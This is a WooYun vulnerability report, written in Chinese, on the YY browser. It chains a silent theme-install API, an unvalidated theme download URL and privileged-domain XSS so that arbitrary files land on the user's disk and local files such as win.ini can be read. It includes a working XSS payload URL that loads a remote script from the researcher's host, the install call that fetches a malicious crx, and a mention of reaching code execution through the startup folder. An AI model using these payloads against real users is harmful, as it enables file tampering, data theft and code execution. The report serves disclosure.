WooYun.org

YY浏览器最新版：

组合了3个漏洞导致的：
1：）静默安装皮肤接口。
2：）安装皮肤未进行校验，可以随意生成一个皮肤给用户安装。
3：）特权域xss可以调用静默安装接口，给用户本地磁盘写入任意文件（当然可以写入一个html了，写入之后就是file域，可以做很多猥琐的事情）
1，通过对http://ie.yy.com/theme/themeCenter.html 代码的观察，发现有如下API接口：
chrome.webstorePrivate.installBrowserTheme()
允许给用户静默安装皮肤。该函数有3个参数：
函数伪代码：
chrome.webstorePrivate.installBrowserTheme(string,string,string,callfunc)。
第一个参数为皮肤的id，第二个参数为皮肤下载url（此处没有判断是否为皮肤商店的，导致可以任意构造自己恶意的皮肤地址），第三个插件版本号，第四个为回调函数，此处可为空。
具体如下：
chrome.webstorePrivate.installBrowserTheme("coelhilffddbjjpeaocolfcbonedghfa","http://wutongyu.info/skin.crx","3.0")
一开始测试的时候发现皮肤id各方面我没办法获取。我是怎么去生成上面这个皮肤id的呢？很简单，做法如下：
首先去yy皮肤商店下载一个，crx修改为rar解压缩。压缩之后再通过自己的chrome浏览器，有一个打包扩展程序：

生成之后拖入yy浏览器，进行安装：

安装完之后，就得到了我们的id，此处id是为了后续我们编写exp时利用：

这样我们就轻而易举的得到了皮肤id号。
2，皮肤安装的url在测试的过程中发现不需要yy域也可以。那通过上述的方式，我自己生成了一个crx，放置在：wutongyu.info/skin.crx 下。
编写代码：chrome.webstorePrivate.installBrowserTheme("coelhilffddbjjpeaocolfcbonedghfa","http://wutongyu.info/skin.crx","3.0")

执行之后，皮肤变黑

由于此处皮肤内的文件我们可以自定义 ，我们可以写入一个html。通过exe来写入启动目录执行任意代码：
WooYun: QQ浏览器远程任意命令执行漏洞（附有分析和利用）
3，特权域xss。这里我直接用m.yy.com 上一个例子的xss，如果你们需要再找可以说，反正你们现在特权域很多：）
先执行一次：http://m.yy.com/live/toRank.action?f=%22);%0ajQuery.getScript(%22http://wutongyu.info/skin.js%22)//
此处是为了将皮肤下载回本地（顺带带入恶意的html回本地）。
可以看到恶意html已经写入到用户本地了：

再让用户访问：
http://wutongyu.info/expie.htm
当然这2步可以合成一步，为了将过程叙述清楚，我分两部来写。
访问expie.htm之后，如果用户是chrome内核的：

当用户切换到ie内核的时候：
win.ini已经被我们读取：

测试通过环境：win 7 ，xp需要修改iframe加载路径，此处不再重复。